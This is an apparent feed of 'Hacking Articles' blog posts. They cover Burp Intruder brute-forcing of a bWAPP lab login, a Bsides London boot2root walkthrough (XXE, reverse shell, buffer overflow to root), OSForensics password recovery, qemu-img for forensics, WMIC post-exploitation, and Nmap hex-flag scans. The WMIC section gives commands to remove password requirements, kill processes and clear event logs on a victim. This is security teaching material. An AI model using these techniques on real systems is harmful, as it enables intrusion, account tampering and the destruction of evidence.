Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as sniper
  • In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

 Before executing the attack we have added a payload processing rule to the payload type which is Add Prefix and we have given an input string “hash” which is added as a prefix with every input strings in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack as shown in the image.

Add Suffix

This processing rule adds up a suffix after the payload.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as sniper
  • In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Add Suffix and we have given an input string “1234” which is added as a suffix with every input strings in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Match / Replace

This processing rule is used to replace any part of the payload that match a specific regular expression, with a string.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as sniper
  • In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Match / Replace and we have given an input “9870” in the Match Regex which will match the input given with the input strings in the dictionary, if the there is a certain match than it will replace it with the input “1234” given in the Replace with as shown in the image.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Substring

This processing rule is used to extracts a sub-portion of the payload, starting from a specified offset up to a specified length. Here the offset and length are counted from the front.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as sniper
  • In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. Here we had added dictionary using option “Add from list” as shown below in given image.

Before executing the attack we have added a payload processing rule to the payload type which is Substring and we have given an input “0” in From option which specifies the offset and a input “3” in the Length option which specifies the length of the input strings.

For example if “password” is word in dictionary and we had applied above filter so it will place alphabet p = 0; a = 1; s = 2 and s = 3 hence it will read only pass from whole word “password”.

The length specified will select only those inputs having the specific length and other lower or greater length inputs are discarded as shown in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Reverse Substring

This processing rule is used as a substring rule, but the end offset is specified counting backwards from the end of the payload, and the length is counted backwards from the end offset.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as sniper
  • In the given below image we have selected password that means we will need one dictionary files for password.

 Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. Here we had added dictionary using option “Add from list” as shown below in given image.

Before executing the attack we have added a payload processing rule to the payload type which is Reverse Substring and we have given an input “2” in From option which specifies the offset and an input “9” in the Length option which specifies the length of the input strings and they are similar to the Substring rule but it works from backwards of a offset and the length is counted backwards where the offset ends.

For example if “admin123456” is word in dictionary and we had applied above filter so it will place alphabet 4 = 0; 3 = 1 ; 2 = 2 ; 1 = 3 ; n = 4 ; i = 5 ; m = 6 ; d = 7 ; d = 8 ; a = 9  hence it will read  only ‘admin1234’ from whole word “admin123456”.

The length specified will select only those inputs having the specific length and other lower or greater length inputs are discarded as shown in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Modify Case

This processing rule can be used to modify the case of the payload, if needed. This rule has the same options available for the Case Modification payload type which we have explained in Part-1 of the Payload types article.

Source: portswigger.net

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking ArticlesHe is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Payload Processing Rule in Burp suite (Part 1) appeared first on Hacking Articles.

Categories: Cyber India

Hack the Bsides London VM 2017(Boot2Root)

Sat, 03/Feb/2018 - 13:13

Hello friends! Today we are going to take another CTF challenge known as Bsides London 2017. The credit for making this vm machine goes to “Hacker House” and it is another boot2root challenge in which our goal is to get root to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.7 but you will have to find your own)

Let’s do an nmap scan for port enumeration.

nmap -A -p- 192.168.0.7

We find port 80 to be open, port 80 is running http.

So we first open 192.168.0.7 in our browser.

We find a hint to use rafting directory, it is a wordlist that is used to enumerate directories. So we enumerate the directories using raft-large-directories for further information.

dirb http://192.168.0.7 raft-large-directories

Now we enumerate the directories with common wordlist and find a directory called cgi-bin/.

dirb http://192.168.0.7

As the dirb scan gave us a forbidden error on cgi-bin/ directory. We try to look through the files inside cgi-bin

dirb http://192.168.0.7/cgi-bin/ -N 403

We open the links found using dirb, one of those links contains a login page.

We take a look at the source code and find a hexadecimal string.

We decode it using xxd and find a base64 encoded string. After decoding it we found that the base64 string starts from Y so we select the string from Y and found a hexadecimal string inside a flag. We decode it and find a string.

We use this string as password to login through the login page, we use username as admin.

Even after login we don’t find anything on the login page, so we move to the links provided by the dirb scan.

We found one page that looks like a blank page.

When we take a look at the source page, we found that it is xml based page that may be vulnerable to XML Entity Injection(XXE).

We use burpsuite to capture request of that page and then send it to repeater, we then use XXE to exploit the system.

We find that only /etc/passwd is visible in plain text, to get the rest of the files we need to php base64 filter.  So we get apache.conf file to know about the system.

Now we decode the base64 encoded string and save it in a file ‘bsides-apache.conf’.

Now when we check the configuration to find information about the system.

Now we use XXE to get the rest of the configuration files.

We decode the base64 encoded string and then save it as bsides-default.conf.

Now we take a look at the configuration file, we get the location of the cgi configuration file.

Now we use XXE to get the configuration file for CGI files.

We decode the base64 encoded string and save it as bsides-cgi.conf

Now we take a look at the cgi configuration file and find the location of load file that we dirb scan showed us.

Now we download the load file using XXE to find more information about the file.

We decode the base64 encoded string and save it as bsides-load.

Now we check the file type and find it is an elf executable file.

File bsides-load

We use strings to check the content of the file and find that it is compressed using UPX.

Strings bsides-load

Now we use UPX to decompress the file

upx -d bsides-load

After decompressing the file we check the strings and find that it read a file and decrypts the file using the hex value of “WannaCry?”

Now we use radare to reverse engineer the file and find that it can run files that are encrypted with hex value of ‘WannaCry?’

Now we create a hex value of ‘WannaCry?’. We use od to convert it into hex and sed to remove the space between values.

echo -n “WannaCry?” | od -A n -t x1 |sed ‘s/ *//g’

We create a reverse shell first to exploit the system. We create pipe files to execute our command.

Now we create a 32-bit shared object file using gcc and convert it to a binary file using the hex value of ‘WannaCry?’ as key with openssl.

gcc -m32 -shared -fPIC -o exploit.so exploit.c

openssl aes-128-cbc -K ‘key’ -iv 0 -e -in exploit.so -out exploit.bin

Now we upload the file to the server, dirb scan gave us a link that can be used to bin files. After upload file we get the location of the file where it is uploaded. The name of our file also changes after we upload it.

We copy the new file name and use the load file to run our shell.

We setup our listener using netcat, as soon as we execute the shell we get the reverse shell.

Now we find files with suid bit set and find a file in /home/level1/ called shisu

find / -perm -4000 2>/dev/null

We move to the directory and run the command and find that it is an executable file.

file shisu

When we run the file we find that it runs the command ps.

We are unable to read debugging symbols in gdb so we use objdump to reverse engineer the file and found that the file has a string copy after which it removes the top 10 bytes in stack.

objdump -M intel -d shisu

We now use gdb to add a breakpoint before it removes the memory from the stackpoint. We use python to print 500 ‘A’. Then we check the stack and find it is overwritten with A’s.

Now this file maybe vulnerable to buffer overflow.  After fuzzing a few times we find that at 516 bytes of data we can overwrite the EIP and we get a segmentation fault.

So we now use this to exploit this vulnerability and get a privileged shell.

Now we run the file along with a 516 byte of shellcode and we get a privileged shell.

Now we use id command and find that we are root user now.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Bsides London VM 2017(Boot2Root) appeared first on Hacking Articles.

Categories: Cyber India

Digital Forensics Investigation through OS Forensics (Part 3)

Fri, 02/Feb/2018 - 15:36

In Part 2 of this article we have covered Recent Activity, Deleted File Search, Mismatch File Search, Memory Viewer and Prefetch Viewer. This article will cover some more features/ functionalities of OSForensics.

To Read Part 2 of this article click here.

Raw Disk Viewer

On a drive data is generally stored in file system files and directories but when it comes to forensics we need a more deeper inspection of drives we can have a evidence within the raw sectors of the drive , image . These sectors are not accessible through Operating system but we can access the raw sectors through OS Forensic’s Raw Disk Viewer.

Raw Disk Viewer includes text/hex searching, highlighting of relevant disk offsets, and decoding of known disk structures (such as MBR, GPT)

Source : https://www.osforensics.com

To start with open OSF and click on Raw Disk Viewer

From the disk dropdown select the Evidence we want to investigate.

Click on the config button and make the required changes. We can specify the sector range limit, highlight the file types by different colors, include/exclude file system objects.

To look for a particular file/sector/offset click on Jump To button, we can see a screen to select any particular file or offset.

To get the details of any particular file select file and browse the file .

Click on open and then OK, the file will open in HEX for investigation.

Click on the decode button to get the details of the file. This will provide the cluster number and sector of the file.

Right click on the file to get all the available options of the file/offset/cluster.

Click on Search button, a screen will appear where we can search for Hex or Text and continue . This will search the particular text or Hex within the raw sectors and will display the result.

Click on bookmark button on the main screen of Raw Disk Viewer . we can create the bookmarks for the relevant evidences.

Create a new bookmark by specifying its start offset and end offset. We can differentiate the bookmark through its color.

The bookmark saved will get listed .

If we click on the bookmark the offset range will get highlighted on the main screen and will mark the starting of the offset with a flag and color of the the flag is that of the bookmark.

This concludes Raw Disk Viewer.

Registry Viewer

Registry viewer enables  to investigate  the registries of an evidence.

To start with open the registry viewer, we can select the drive/evidence we want to work on. All the registry files in that particular drive/evidence will get listed on the right side.

Double Click on any file and we can navigate to the registries and can get all the details.

This concludes Registry Viewer

File System Browser

File system browser enables us to navigate to the Drive/Evidence.

We can navigate through all the files/directories and perform multiple activies . In file system browser we have the other options of OSF as well like File search, Mismatch search, Create Index, Create signature. Some of these features we have already talked about and some of them we will discuss in coming articles.

WE can check the “Show Deleted File” option  by clicking on Tools > Option > Show Deleted File.

 The deleted files/directories (if any) will also get listed and will marked with a red cross .

This concludes File System Browser.

Passwords

Passwords feature enable us to retrieve the password related information of the evidence. These passwords could be passwords stored within the browser, Windows Login Passwords, WE can also create a rainbow table by making the multiple combination of the passwords and retrieve the passwords from the rainbow table. Under OSF passwords  also have an option to decrypt an encrypted file.

To start with open OSF and select passwords

The first tab is to Find Passwords & Keys , this will allow to the recover the stored password from the browser , outlook , windows auto logon passwords , etc.  We can either do the live acquisition of current machine or Scan Drive and select any drive or evidence.

Click on Config button, check the passwords you want to recover. Select the decrepton settings based on requirements, we can include our dictionary file or can use an automatic dictionary. If credentials are known we can provide windows login credentials and click OK.

Click on Acquire passwords button to start the process.

All the passwords / product keys will get listed.

The below image is the passwords  acquisition of the Current Machine for better understanding as the evidence we re working on doesn’t any stored wireless network.

Select Windows Login Password , select the Drive/evidence and click Acquire passwords

All the information will get listed. If there is any saved password it will get listed also we can get info about it also we can get NT hash and LM Hash of the password from which we can recover the password.

We have an option to generate rainbow table. This is used to create a list of passwords with different combinations and permutations. We can choose from the different options / combinations from the drop down . More huge and  complex the inputs are the longer the time it will take.

Browse the file path where we want to save the table and if required modify the parameters. Click on create rainbow table button to start with the process.

Depending on the complexity the process will start.

Password through rainbow table. If the password is within the rainbow table we have created and we have the NT hash and LM Hash we can recover the passwords  (however this ). TO achieve this we need to add the folder of the Rainbow table under “Select Rainbow Table” and can either enterthe raw hash or can browse the file which may contain the hash , if the password is present within the rainbow table , we will get the password .

In the image we are browsing the file “hash.txt” , we have saved in windows login password (shown above)and the rainbow table we have created .

Click on recover Password/s button to start the process , if the password present in Hash.txt is found in rainbow table we will get the result .

In the above we haven’t found the password as it must be not present inside the table. Also these tables have certain limitations and have the success rate of 95 % (approx). Their are other methods as well for recovery of passwords we will be discussing on other articles.

This concludes Passwords.

For more on OSForensics wait for the next article.

Author: Ankit Gupta, the author and co-founder of this website, an ethical hacker, forensics investigator , penetration testing researcher and telecom expert. He has found his deepest passion to be around the world of telecom, cyber security and digital forensics. Contact Here

The post Digital Forensics Investigation through OS Forensics (Part 3) appeared first on Hacking Articles.

Categories: Cyber India

Convert Virtual Machine to Raw Images for Forensics (Qemu-Img)

Thu, 01/Feb/2018 - 11:52

This is a very handy little application. It’s been developed by the QEMU team. The software is very useful when dealing with virtualization, Qemu-img is available for both windows and Linux. Its function is to give you the ability to change the format of a given virtual disk file to the majority of the popular virtual disk formats that are used across platforms. Let’s say you are using virtual box in Windows and want to migrate the virtual disk to be used on a mac, in parallels, you can use this simple program to achieve this with minimum effort.

Our purpose of writing about this today is slightly different from Qemu-img’s mainstream usage, we want to focus on how we can use this application to convert a virtual disk image, whole or split into a .raw file that can be used with most of the popular forensic frameworks that are available.

Let’s start up Qemu-img on our Linux machine

At the terminal prompt type “qemu-img –h”

This will show you all the options that can be used with qemu-img

Right at the end of the information that is presented after the command given above is used, we can see all the formats supported by this application.

Here is a list of all the formats that are compatible with Qemu-img

Now let’s see how this application comes in handy for use in forensics.

In a situation where a virtual disk is part of the acquisition and further dedicated analysis is required, the virtual disc can be converted into .raw format.

Let’s begin.

Since our goal is to analyze the virtual disk, we are using the image file from Windows 7 installed on VMWare. The file in question is in .vmdk format.

Just a heads up, when you convert a virtual disk file to a .raw file, the size of the converted file can be quite big, so make sure you have enough space.

Here is our .vmdk file

For ease of use, we have placed the .vmdk file in a folder named Qmeu on the desktop. The terminal is opened from within the folder.

At the terminal prompt type “qemu-img convert -f vmdk -O raw Windows\ 7.vmdk win7.raw”

A breakdown of the command that we just gave:

qemu-img convert  is invoking the convert function of qemu-img.

-f is the format of the input file, which in this case is .vmdk

-O is the format of the output file that we want, a .raw file.

Windows\ 7.vmdk is the name of the input file that we have in our folder.

win7.raw is the name we have given the output file with its file extension.

Give it a few minutes and check the folder, you will find the converted file.

As you can see, the size of the .raw file is 10.7 GB and the size of the .vmdk file was 6.0 GB, that’s quite a jump in size!

We can now use Foremost to carve the .raw file to see what’s inside.

At the terminal type “foremost -t jpeg,png -i win7 -o output”

With this command we are carving the .raw file for .jpeg and .png files which will be collected in a folder named output. If you have any doubts about foremost you can refer this article.

As you can see, our .raw file has been successfully carved, the results are visible below

We have successfully carved a .raw file made from a virtual disk, now let’s mount the .raw file to view its contents. We will be using a Windows for this operation.

Now we will mount this .raw file using FTK Imager to see its contents. The image mounting option can be found under the File menu. Navigate to the .raw file from within the mounting menu.

Select Mount, leave the other options as they are and the file will appear on the Mapped Image List.

Next we navigate to My Computer and we can see that the .raw has been mounted as a partition.

The windows file system can be seen within and explored for content.

Qemu-img is a very simple application with a high potential. It can be a very valuable tool in your forensic toolkit due to its large list of compatible formats. It will make sure that the format of the acquired image does not keep you from using your forensic tool of choice to run your investigation or carve out data.

We hope you enjoy using this tool.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

The post Convert Virtual Machine to Raw Images for Forensics (Qemu-Img) appeared first on Hacking Articles.

Categories: Cyber India

Post Exploitation Using WMIC (System Command)

Wed, 31/Jan/2018 - 23:48

This article is about Post Exploitation using the WMIC (Windows Management Instrumentation Command Line). When an Attacker gain a meterpreter session on a Remote PC, then he/she can enumerate a huge amount of information and make effective changes using the WMI Command Line.

To do this, we will first get the meterpreter session on the Remote PC which you can learn from here. After gaining the session, escalate its privilege to Administrator which you can learn from here.

WMIC command line can be accessed through the windows cmd. To access that type “shell” in the meterpreter shell.

Now let’s look at the wmic commands and their working

WMIC

This command shows the global options which are used in the wmic command. WMIC Global Options are used to set properties of the WMIC environment. With the combination of global options and the aliases than we can manage the system through the wmic environment.

Syntax/Example: wmic /?

Get System Roles, User Name, and Manufacturer

We can enumerates lots of information about the Victim System including its Name, Domain, Manufacturer, Model Number and Much more through the computer system alias of wmic command.

We are adding following filters to get specific result.

Roles: It gives all the roles that the victim system play like Workstation, Server, Browser etc.

Manufacturer: It give the manufacturer of the system, sometimes there are certain vulnerabilities in a particular model of a particular model. So we can use this information to search for any direct vulnerabilities.

UserName: It gives the username of the system which is proven very helpful as we can differentiate between administrators and normal users

[/format:list]: To sort the output in a list format.

Example: wmic computersystem get Name, Domain, Manufacturer, Model, Username, Roles /format:list

Get the SIDs

To enumerate these SIDs we will use group alias of wmic.

Syntax/Example: wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status

As shown in the below image here we have found the Account Name, Domain, Local Group Member status, SID and their status.

Create a process

We can create many process on the victim’s system using the process alias of wmic command.

This is helpful in running any backdoor or fill up the memory of the victim’s system.

Syntax: wmic process call create “[Process Name]”

Example:  wmic process call create “taskmgr.exe”

As you can see in the below screenshot that this command not only create a process but also gives the “process id” so that we can manipulate that process according to our need.

Note: if the process creates a window like Task Manager, cmd, etc. then this command will open up that window on victim’s system and create suspicion in the mind of victim.

Change Priority of a Process

We can change priority of any process running on the victim’s system with the help of process alias of wmic command.

This is an important feature because it can be used manipulate processes as we can increase the priority of any process of our choice or decrease priority of any process. Decreasing the priority of any process can result in crashing of that particular application and increasing may crash the overall system.

Example: wmic process where name=”explorer.exe” call set priority 64

Terminate a process

We can terminate process running on the victim’s system with the help of process alias of wmic command.

Example: wmic process where name=”explorer.exe” call terminate

Get a list of Executable Files

We can get a list which contains the location of the executable files other than that of windows.

Example: wmic process where “NOT ExecutablePath LIKE ‘%Windows%’” GET ExecutablePath

Get Folder Properties

To extract the basic information about a folder on the victim’s system we can use fsdir alias of wmic command line.

It can enumerate following information about a folder:

Compressed, CompressionMethod, Creation Date, File Size, Readable, Writable, System File or not, Encrypted, Encryption Type and much more.

Example: wmic fsdir where=”drive=’c:’ and filename=’test’” get /format:list’

Get File Properties

To extract the basic information about a file on the victim’s system we can use datafile alias of wmic command line.

It can enumerate following information about a file:

Compressed, CompressionMethod, Creation Date, File Size, Readable, Writable, System File or not, Encrypted, Encryption Type and much more.

Syntax: wmic datafile where=’[Path of File]’ get /format:list

Example: wmic datafile where name=’c:\\windows\\system32\\demo\\demo.txt’ get /format:list

Locate System Files

Extract paths of all the important system files like temp folder, win directory and much more.

Example: wmic environment get Description, VariableValue

From given below image you can read variablevalue with their given description.

Get a list of Installed Applications

We can get a list of applications or softwares installed on the victim’s system

Example: wmic product get name

Get a list of Running Services

We can fetch the list of services which are running and services which start automatically or not.

Example: wmic service where (state=”running”) get caption, name, startmode

From given below image you can observe startmode either as “Auto” or as “Manual” and state “Running” for given services.

Get Startup Services

We can enumerate startup services using startup alias for all the services that run during the windows startup.

Example: wmic startup get Caption, Command

 

Get System Driver Details

We can enumerate Driver Details like Name, Path and Service Type using the sysdrive alias.

This command gives the path of the driver file, its status (Running or Stopped), Its Type (Kernel or File System)

Example: wmic sysdriver get Caption, Name, PathName, ServiceType, State, Status /format:list

Get OS Details

We can enumerate the location of the victim by using the time zone in which the system is set, this can be extracted using the os alias.

We also get the Last Boot Update Time and The Number of Registered Users and Number of Processors and information about Physical & Virtual Memory, all using os alias.

Example: wmic os get CurrentTimeZone, FreePhysicalMemory, FreeVirtualMemory, LastBootUpdate, NumberofProcesses, NumberofUsers, Organization, RegisteredUsers, Status /format:list

Get the Motherboard Details

We can use the baseboard alias of wmic command line to enumerate the motherboard details of victim’s system. Things we can enumerate are Motherboard Manufacturer, Serial Number and Version

Example: wmic baseboard, get Manufacturer, Product, SerialNumber, Version

Get BIOS Serial Number

We can use the bios alias of wmic command line to enumerate the bios details of victim’s system.

Example: wmic bios, get serialNumber

From given below image you can check bios serial number that we have enumerate of victim’s system.

Get Hard Disk Details

We can enumerate information about the System Hard Disk using the diskdrive alias.

We get to know the Interface Type, Manufacturer and Model Name, all through this command.

Syntax: wmic diskdrive get Name, Manufacturer, Model, InterfaceType, MediaLoaded, MediaType /format:list

Get Hard Disk Partitions Details

We can get the information about the Hard Disk Partitions using the logicaldisk alias.

We get the name, compression status, File System (NTFS, FAT) and much more all using this command.

Syntax: wmic logicaldisk where drivetype=3 get Name, Compressed, Description, FileSystem, FreeSpace, SupportsDiskQuotas, VolumeDirty, VolumeName

From given below image you can read description of disk along with filesystem i.e. NTFS and available free space and many more details as per your requirement.

Get Memory Cache Details

We can get the information about the Memory Cache using memcache alias. We can get the name, block size, purpose and much more all using this command.

Example: wmic memcache get Name, BlockSize, Purpose, MaxCacheSize, Status

From given below image you can observe here it is showing details of two cache memory.

Get Memory Chip Details

We can get the information about the RAM using the memorychip alias.

We get the Serial number of the RAM without removing the RAM or physically being near the system using this command.

Example: wmic memorychip get PartNumber, SerialNumber

Detect If victim system is a host OS or installed via VMware

We can enumerate information about the victim’s system that weather it is running a host operating system i.e. running by directly installing on hard drive or running virtually using VMware or Virtual Box.

Syntax: wmic onboarddevice get Desciption, DeviceType, Enabled, Status /format:list

Here from given below image if you will observe the highlighted text then you see it showing VMware in description.

User Account Management Lock a User Account

We can restrict a local user from using its account by using useraccount alias, here we are going to lock a User Account.

Example: wmic useraccount where name=’demo’ set disabled=false

From given below image you can observe that we had successfully locked the user account for user “demo”.

Remove Password requirement for logging

We can remove a local user’s requirement of its password for login by using useraccount alias

Example: wmic useraccount where name=’demo’ set PasswordRequired=false

Rename a user account

We can rename a local user by using useraccount alias

Example: wmic useraccount where name=’demo’ rename hacker

Restrict user from changing a password

We can restrict a local user from changing its password by using useraccount alias

Example: wmic useraccount where name=’hacker’ set passwordchangeable=false

Get Antivirus Details

We can enumerate the antivirus installed on the victim’s system along with its location and version.

Syntax: wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe

Clear System Logs

Wmic can be used to delete system logs using the nteventlog alias. It is a very simple command where we mention the name of log and then using an option nteventlog and clear the log file. It can be an effective command while cleaning up after hacking any system.

Syntax: wmic nteventlog where filename='[logfilename]’ cleareventlog

Example: wmic nteventlog where filename=’system’ cleareventlog

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Post Exploitation Using WMIC (System Command) appeared first on Hacking Articles.

Categories: Cyber India

Nmap Scans using Hex Value of Flags

Wed, 31/Jan/2018 - 18:33

In this article we are going to scan the target machine by sending TCP flags through their hexadecimal value and the actual Flag name can be confirm by analysis of Nmap traffic through Wireshark.

Let’s have a look over Hex value of TCP Flag in given below table which we are going to use in Nmap for port enumeration.

NULL Scan

In this scan we are sending the NONE flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x00 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-NONE flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-NONE packet for hex value 0x00 coming from 192.168.1.104 on port 21 as shown in given below image. 

FIN Scan

TCP-FIN flag always used for finished the communication with target network. In this scan we are sending the FIN flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x01 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-FIN flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-FIN packet for hex value 0x01 coming from 192.168.1.104 on port 21 as shown in given below image. 

SYN Scan

TCP-SYN flag always initiate communication to establish the connection with target network. In this scan we are sending the SYN flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x02 192.168.1.103

From given below image you can observe we have successfully found port 21 open.

When network admin will captured the incoming traffic he will get packet for TCP-SYN flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-SYN packet for hex value 0x02 coming from 192.168.1.104 on port 21 as shown in given below image. 

Reset Scan

RST flag is used to reset the connection between the sender machine and the target machine. In this scan we are sending the RST flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x04 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-RST flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-RST packet for hex value 0x04 coming from 192.168.1.104 on port 21 as shown in given below image. 

PUSH Scan

In this scan we are sending the PSH flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x08 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-PSH flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-PSH packet for hex value 0x08 coming from 192.168.1.104 on port 21 as shown in given below image. 

PUSH flag is used to push the process priority higher of the packet to the target machine.

ACK Scan

Ack flag is used to acknowledge the sender machine whether the packet is received or dropped by the target. So that the sender again send the lost or dropped packet on the target network to complete the communication process. Here we are sending the ACK flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x10 192.168.1.103

From given below image you can observe we have found port 21 closed.

When network admin will captured the incoming traffic he will get packet for TCP-ACK flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-ACK packet for hex value 0x10 coming from 192.168.1.104 on port 21 as shown in given below image. 

Open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined. Ports that don’t respond, or send certain ICMP error messages back (type 3, code 0, 1, 2, 3, 9, 10, or 13), are labeled filtered. (Form Nmap.org)

Urgent Scan

URG flag is used to set the high process priority of the packet to the target. So that target machine stops processing the current packet and process the URG Flag packet. In this scan we are sending the Urg flag of the tcp by using its hexadecimal value on the target machine to enumerate the state of ports is open, closed or filtered.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x20 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP-URG flag, here we have used wireshark for network packet analysis and we found that it is showing TCP-URG packet for hex value 0x20 coming from 192.168.1.104 on port 21 as shown in given below image. 

XMAS Scan

In this scan we are sending the combination of hexadecimal value of the different flag on the target machine. As we know in Xmas scan combination of three TCP-flags [FIN, PSH, URG] are used to enumerate state of port.

By adding the value of the flag, which is equal to the hexadecimal value of the sender’s hexadecimal value as describe in given below table.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x29 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN, PSH, URG] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, PSH, URG for hex value 0x29 coming from 192.168.1.104 on port 21 as shown in given below image. 

Manual Combination of Flags [FIN, SYN, PSH]

Let have a quick review over decimal to hexadecimal conversion with the help of following table:

Now repeat the same methodology by changing the combination of flag to enumerate the state of any port.  For example we want to scan any port by sending combination of three flags [FIN, SYN, and PSH] so let identify hex value for sum of three flags.

Now execute given below command for enumerating state of any port, here we want to identify state for port 21.

nmap -p21 –scanflags 0x0B 192.168.1.103

From given below image you can observe we have found port 21 filtered.

When network admin will captured the incoming traffic he will get packet for TCP flags [FIN, SYN and PSH] here we have used wireshark for network packet analysis and we found that it is showing TCP-packet of FIN, SYN,PSH for hex value 0x0B coming from 192.168.1.104 on port 21 as shown in given below image. 

Manual Combination of Flags [FIN, RST, PSH]

